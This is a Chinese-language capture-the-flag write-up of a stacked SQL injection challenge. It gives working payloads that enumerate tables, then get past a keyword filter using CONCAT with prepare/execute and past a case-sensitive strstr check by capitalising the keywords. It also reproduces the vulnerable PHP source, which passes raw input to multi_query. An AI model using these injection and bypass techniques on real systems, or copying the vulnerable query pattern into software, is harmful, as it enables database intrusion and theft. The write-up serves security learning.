查看源代码未找到有用信息, 尝试提交数字1, 返回一个数组,
接着尝试注入1' or 1;%23, 成功返回三个数组,但未找到flag.
尝试堆叠注入
查出表名,可以看到words和1919810931114514两个表
image-20211029165116741
堆叠注入
1
| 1' or 1;show tables;desc `1919810931114514`;desc `words`;%23
|
查出两个表的字段.
观察到words表有两个字段id和data,
1919810931114514仅有一个字段flag,
猜测flag就在表1919810931114514中.
image-20211029170144998
尝试注入
1
| 1' or 1;select * from `1919810931114514`;%23
|
提示
1
| return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);,
|
得知有关键字审查
image-20211029220716039
采用预编译的方式绕过关键字审查, 构造注入语句:
1
2
3
4
5
6
7
| 1';set @sql = CONCAT('se','lect * from `1919810931114514`;');prepare stmt from @sql;EXECUTE stmt;
#拆开为
1'; #闭合单引号
set @sql = CONCAT('se','lect * from `1919810931114514`;'); #定义变量,采用CONCAT()拼接字符串绕过审查
prepare stmt from @sql; #预编译SQL语句
EXECUTE stmt; #执行编译完的SQL语句
|
image-20211029223621684
提示
1
| strstr($inject, "set") && strstr($inject, "prepare")
|
有第二道关键字审查, 由于strstr区分大小写, 而set和prepare大小写不敏感,
故更改注入语句为
1
| 1';Set @sql = CONCAT('se','lect * from `1919810931114514`;');Prepare stmt from @sql;EXECUTE stmt;
|
即可绕过审查, 拿到flag
image-20211029223717822
源代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
|
<?php
function waf1($inject) {
preg_match("/select|update|delete|drop|insert|where|\./i",$inject) && die('return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);');
}
function waf2($inject) {
strstr($inject, "set") && strstr($inject, "prepare") && die('strstr($inject, "set") && strstr($inject, "prepare")');
}
if(isset($_GET['inject'])) {
$id = $_GET['inject'];
waf1($id);
waf2($id);
$mysqli = new mysqli("127.0.0.1","root","root","supersqli");
$sql = "select * from `words` where id = '$id';";
$res = $mysqli->multi_query($sql);
if ($res){
do{
if ($rs = $mysqli->store_result()){
while ($row = $rs->fetch_row()){
var_dump($row);
echo "<br>";
}
$rs->Close();
if ($mysqli->more_results()){
echo "<hr>";
}
}
}while($mysqli->next_result());
} else {
echo "error ".$mysqli->errno." : ".$mysqli->error;
}
$mysqli->close();
}
?>
|